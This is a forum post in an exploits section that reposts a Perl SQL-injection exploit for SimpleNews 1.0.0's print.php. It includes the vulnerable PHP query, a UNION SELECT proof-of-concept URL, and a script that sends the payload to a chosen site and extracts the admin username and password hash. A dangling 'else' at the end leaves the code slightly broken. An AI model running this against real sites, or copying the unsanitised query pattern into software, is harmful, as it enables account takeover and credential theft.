Jump to content
Ras

SimpleNews <= 1.0.0 FINAL (print.php news_id) SQL Inj

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!/usr/bin/perl -w

#################################################################################
#                              #
#        SimpleNews <= 1.0.0 FINAL SQL Injection Exploit      #
#                              #
# Discovered by: Silentz                     #
# Payload: Admin Username & Hash Retrieval               #
# Website: [url]http://www.No_Advertising.com[/url]                  #
#                               #
# Vulnerable Code (print.php):                      #
#                              #
#      $news_id = $_GET['news_id'];                  #
#      $query = "SELECT * FROM simplenews_articles WHERE news_id = '$news_id'"; #
#                              #      
# PoC: http://victim.com/print.php?news_id=-999' UNION SELECT 0,username,   #
#      password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /*      #
#                               #
# Subject To: magic_quotes_gpc set to off               #
# GoogleDork: Get your own!                     #
#                              #
# Shoutz: The entire No_Advertising community                  #
#                              #
#################################################################################

use LWP::UserAgent;
if (@ARGV < 1){
print "-------------------------------------------------------------------------\r\n";
print "               SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: No_Advertising.pl [PATH]\r\n\r\n";
print "[PATH] = Path where SimpleNews is located\r\n\r\n";
print "e.g. No_Advertising.pl http://victim.com/simplenews/\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                   http://www.No_Advertising.com\r\n";
print "                          ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "print.php?news_id=-999' UNION SELECT 0,username,password,0,0,0,0,0 FROM simplenews_users WHERE user_id=1 /*";

$res = $b->request(HTTP::Request->new(GET=>$host));
$res->content =~ /([0-9a-fA-F]{32})/;

print "-------------------------------------------------------------------------\r\n";
print "               SimpleNews <= 1.0.0 FINAL SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "[+] Admin User = ".$res->title, "\r\n";
print "[+] Admin Hash = $1\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                   http://www.No_Advertising.com\r\n";
print "                          ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";

else {print "\nExploit Failed...\n";}

# milw0rm.com [2007-05-09]

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...